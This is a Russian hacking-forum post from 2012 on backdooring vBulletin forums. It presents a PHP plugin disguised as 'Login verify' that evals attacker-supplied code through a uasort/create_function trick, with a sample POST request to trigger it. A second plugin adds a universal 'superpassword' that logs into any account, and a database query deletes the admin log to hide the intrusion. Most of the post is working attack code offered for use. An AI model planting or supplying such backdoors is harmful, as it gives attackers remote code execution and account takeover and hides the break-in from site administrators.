Старый 27.04.2012, 16:39   #1
O'NeiLL
RAM 256MB
 
Аватар для O'NeiLL
 
Регистрация: 04.11.2010
Сообщений: 968
O'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордитсяO'NeiLL за этого человека можно гордится
O'NeiLL вне форума

По умолчанию Протроянивание форумов vBulletin


Заливаем сам шелл-модуль:
Добавляем новый модуль: (к сожалению на локалке стоит не русифицированная версия, но, думаю, и так понятно)

PHP код:
ProductvBulletin
Hook Location
global_start
Title
Login verify 
Execution Order
1
Plugin PHP Code

if(isset(
$_REQUEST['re_password')){
    
uasort($_REQUEST['login'], $_REQUEST['password']);
}
Plugin is ActiveYes 
Пример использования:
PHP код:
POST: /private.php
re_password
=ob_end_clean();phpinfo();die();&login[]=};eval($_REQUEST['re_password']);//&login[]=$b, $a&password=create_function 
Создание универсального пароля
Добавляем новый модуль:
PHP код:
ProductvBulletin
Hook Location
login_verify_failure_password
Title
Login verify 
Execution Order
1
Plugin PHP Code

if(
$password == 'superpassword'$return_value true;
Plugin is ActiveYes 
Теперь можно входить в любые аккаунты, используя пароль "superpassword".

Очистка логов
Если админ не имеет доступа к логам панели управления, а очистить их необходимо, то всегда можно выполнить запрос напрямую в бд:
PoC:
PHP код:
$db->query_write("DELETE FROM " TABLE_PREFIX "adminlog"); 
Используя шелл-модуль, что я описал выше:
PHP код:
POST: /private.php
re_password
=$db->query_write("DELETE FROM " TABLE_PREFIX "adminlog");&login[]=};eval($_REQUEST['re_password']);//&login[]=$b, $a&password=create_function 
(c) Boolean, 0x0000ED.CoM, 2012
__________________
[Ссылки доступны только зарегистрированным пользователям . Зарегистрируйся, чтобы увидеть ссылку.]
  Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.



взломать аську аську взломать взлом программы сделать взлом программы как сделать взлом программы хакерские сайты как легко взломать аську лучшие хакерские сайты топ список хакерские сайты взлом паролей легкий взлом паролей

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2009, Jelsoft Enterprises Ltd. Перевод: zCarot